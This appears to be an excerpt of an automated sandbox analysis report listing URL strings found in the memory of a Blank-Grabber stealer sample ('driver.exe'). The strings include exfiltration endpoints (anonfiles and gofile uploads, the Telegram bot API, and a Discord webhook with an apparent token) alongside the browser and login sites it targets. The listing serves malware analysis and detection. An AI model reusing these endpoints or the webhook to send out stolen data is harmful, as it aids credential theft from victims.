Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr#
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~r
Source: driver.exe, 00000002.00000003.2184794843.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.stripe.com/v
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: driver.exe, 00000000.00000003.2060119288.000001C6D727C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1326920011201118251/xRN_dhCbCT8HeZRae0xJk1yw1sh06GaK4mq7ylVag5fFfCb
Source: driver.exe, 00000002.00000003.2184794843.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: driver.exe, 00000002.00000002.2439345292.000001C0EDD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED6C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: driver.exe, 00000002.00000002.2438725713.000001C0ED950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: svchost.exe, 00000030.00000003.2157180555.000002106B873000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000030.00000003.2157180555.000002106B800000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: driver.exe, 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr#
Source: driver.exe, 00000002.00000003.2075105413.000001C0EE390000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075481940.000001C0EE09C000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075373068.000001C0EE044000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2075977793.000001C0EE0A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F8022A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: driver.exe, 00000002.00000002.2438237323.000001C0ED744000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2079997123.000001C0EE0D4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2078386891.000001C0EE0E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: driver.exe, 00000002.00000002.2437809693.000001C0EBD9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: driver.exe, 00000002.00000002.2442254486.000001C0EE6B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F80ED7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: driver.exe, 00000002.00000003.2190639950.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: driver.exe, 00000002.00000002.2438725713.000001C0ED9B7000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2438981271.000001C0EDBD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: driver.exe, 00000002.00000002.2439933972.000001C0EE1DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: driver.exe, 00000002.00000003.2080866630.000001C0EDCAF000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2079393233.000001C0EDA2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: driver.exe, 00000002.00000002.2445265789.000001C0EF758000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: driver.exe, 00000002.00000002.2445265789.000001C0EF73C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000E.00000002.2243088797.000001A9C5C53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F901BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2261891481.0000028F8196B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2310314643.0000028F9007A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000002F.00000002.2261891481.0000028F81653000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: driver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: driver.exe, 00000002.00000003.2149672861.000001C0EE151000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2435979821.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2188298866.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335408296.000001C0EE14B000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434711716.000001C0EE152000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: driver.exe, 00000002.00000002.2441846690.000001C0EE490000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: driver.exe, 00000002.00000003.2065257439.000001C0ED951000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: driver.exe, 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: driver.exe, 00000000.00000003.2059613372.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: driver.exe, 00000002.00000003.2186287198.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441499292.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335260534.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2115178602.000001C0EED48000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: driver.exe, 00000002.00000003.2335617765.000001C0EE35D000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2191367596.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: driver.exe, 00000002.00000003.2435146578.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439933972.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2189780430.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335486016.000001C0EE0AE000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2150956098.000001C0EE0B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: driver.exe, 00000002.00000003.2079997123.000001C0EE114000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: driver.exe, 00000002.00000003.2190639950.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2334802815.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2434655198.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2440748716.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149413068.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2187487216.000001C0EE28A000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE289000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: driver.exe, 00000002.00000002.2441997627.000001C0EE590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: driver.exe, 00000002.00000003.2186287198.000001C0EE2A4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2143041528.000001C0EE2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: driver.exe, 00000002.00000003.2334802815.000001C0EE22F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: driver.exe, 00000002.00000002.2442424891.000001C0EE828000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: driver.exe, 00000002.00000003.2186287198.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2329743274.000001C0EEED4000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2441499292.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2335260534.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2115178602.000001C0EED48000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE380000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2445265789.000001C0EF730000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2442424891.000001C0EE7D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: driver.exe, 00000002.00000003.2188298866.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2149672861.000001C0EE1C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: driver.exe, 00000002.00000003.2103195176.000001C0EE371000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: driver.exe, 00000002.00000003.2126069421.000001C0EE2CD000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2126069421.000001C0EE35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: driver.exe, 00000002.00000003.2107373008.000001C0EED93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: driver.exe, 00000002.00000003.2115178602.000001C0EED83000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2130149683.000001C0EED83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
